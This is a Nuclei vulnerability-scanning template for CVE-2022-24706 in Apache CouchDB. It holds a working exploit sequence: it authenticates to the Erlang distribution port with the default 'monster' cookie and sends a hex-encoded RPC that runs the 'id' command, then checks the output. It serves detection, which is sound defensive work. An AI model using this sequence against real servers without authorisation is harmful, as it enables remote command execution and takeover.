nuclei-templates/network/cves/2022/CVE-2022-24706.yaml

62 lines
2.3 KiB
YAML

id: CVE-2022-24706
info:
name: CouchDB Erlang Distribution - Remote Command Execution
author: Mzack9999,pussycat0x
severity: critical
description: |
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
reference:
- https://www.exploit-db.com/exploits/50914
- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2022-24706
- http://www.openwall.com/lists/oss-security/2022/04/26/1
- http://www.openwall.com/lists/oss-security/2022/05/09/1
remediation: |
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24706
cwe-id: CWE-1188
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
epss-score: 0.97407
metadata:
max-request: 1
product: couchdb
shodan-query: product:"CouchDB"
vendor: apache
verified: "true"
tags: cve,cve2022,network,couch,rce,kev
variables:
name_msg: "00156e00050007499c4141414141414041414141414141"
challenge_reply: "00157201020304"
cookie: "monster"
cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
tcp:
- host:
- "{{Hostname}}"
port: 9100
inputs:
# auth
- data: "{{name_msg}}"
type: hex
read: 1024
- read: 1024
name: challenge
- data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
type: hex
# rce
- data: "{{cmd}}"
type: hex
read: 1024
matchers:
- type: word
part: raw
words:
- "uid"
- "gid"
- "groups"
condition: and
# digest: 4b0a0048304602210093ffb4f5bccf651fa25d037a91e1f0a081fce4f81404fa0d714c336a0cc640ea022100f06fe4191cb5cc0c7d8e71028302e622776af1f07dc61a6450aa8f711752049d:922c64590222798bb761d5b6d8e72950